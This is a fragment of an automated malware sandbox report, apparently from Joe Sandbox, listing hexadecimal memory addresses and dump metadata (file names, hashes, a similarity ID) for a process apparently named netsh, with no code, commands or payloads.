                                                                                                                                                                                          0x0323239f
                                                                                                                                                                                          0x0323239f
                                                                                                                                                                                          0x032323bb
                                                                                                                                                                                          0x032323c8
                                                                                                                                                                                          0x032323ca
                                                                                                                                                                                          0x032323d2
                                                                                                                                                                                          0x0323244c
                                                                                                                                                                                          0x0323244c
                                                                                                                                                                                          0x03232453
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x032323d4
                                                                                                                                                                                          0x032323e7
                                                                                                                                                                                          0x032323e9
                                                                                                                                                                                          0x032323f1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x032323f9
                                                                                                                                                                                          0x03232402
                                                                                                                                                                                          0x03232408
                                                                                                                                                                                          0x0323240c
                                                                                                                                                                                          0x03232413
                                                                                                                                                                                          0x03232423
                                                                                                                                                                                          0x0323243f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x03232441
                                                                                                                                                                                          0x03232446
                                                                                                                                                                                          0x03232446
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x03232446
                                                                                                                                                                                          0x032323fb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x032323fb
                                                                                                                                                                                          0x032323d2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x03232372
                                                                                                                                                                                          0x031d91be
                                                                                                                                                                                          0x031d9118
                                                                                                                                                                                          0x031d90fd
                                                                                                                                                                                          0x031d9102
                                                                                                                                                                                          0x031d910e

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53996151019.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000011.00000002.53997498399.00000000032C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000011.00000002.53997537432.00000000032CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_31a0000_netsh.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: $$@$@wLv
                                                                                                                                                                                          • API String ID: 0-938860298
                                                                                                                                                                                          • Opcode ID: 6330dd9230af8461317f3a38facd7e1a86ebd51298daa56cb01b80ba59738372
                                                                                                                                                                                          • Instruction ID: 482abe3e1cf571aec5111a7da3d94eb26a71e6f8626a8c5812fc2fd687454581
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6330dd9230af8461317f3a38facd7e1a86ebd51298daa56cb01b80ba59738372
                                                                                                                                                                                          • Instruction Fuzzy Hash: 338139B2D10269DBDB25CF54CC44BEEB6B8AF09710F0445EAAA09B7250D7709E84CFA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%